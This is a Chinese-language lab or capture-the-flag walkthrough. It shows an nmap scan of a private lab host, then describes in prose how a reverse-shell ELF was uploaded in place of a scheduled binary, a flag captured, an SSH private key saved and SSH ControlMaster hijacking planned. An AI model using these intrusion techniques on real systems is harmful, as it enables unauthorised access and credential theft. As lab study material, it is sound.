命令:nmap -A -Pn 192.168.243.172
Nmap initial output
Nmap scan report for 192.168.243.172
Host is up (0.21s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5f:05:52:08:c6:45:b7:3b:9b:ae:f4:da:12:e0:2f:10 (RSA)
| 256 dd:e2:b9:d3:92:3e:ac:12:e2:a7:fd:36:75:d8:60:88 (ECDSA)
|_ 256 b0:0a:6f:c0:e8:71:8b:9a:91:c0:fc:7d:67:48:69:a5 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
Aggressive OS guesses: Linux 4.15 - 5.6 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 205.19 ms 192.168.49.1
2 205.17 ms 192.168.243.172
利用192.168.243.171得到的账户密码,登录**http://192.168.243.173:8082/ui/login/**
登录成功之后,发现一个疑似可以上传elf文件的地方:
里面存在一个tpsreports.elf,尝试将第一步生成的rev.elf上传,没有反应,重命名为tpsreports.elf再次上传,等一会,得到反弹shell:
得到第二个flag:58736c6c295a9197ece6762369769108
ls -alh查看nottodd目录下的文件,发现.bash_history,查看找到一些有意思的记录:
保存获取的id_rsa私钥文件内容:
kali尝试免密登录失败。
查看.ssh下的config文件,参考教材P535,SSH Hijacking with ControlMaster。
查看定时任务:nottodd@cb2:/home/nottodd/.ssh$ crontab -l
每五分钟查看/home/nottodd/.ssh/controlmaster目录下是否有新生成的文件: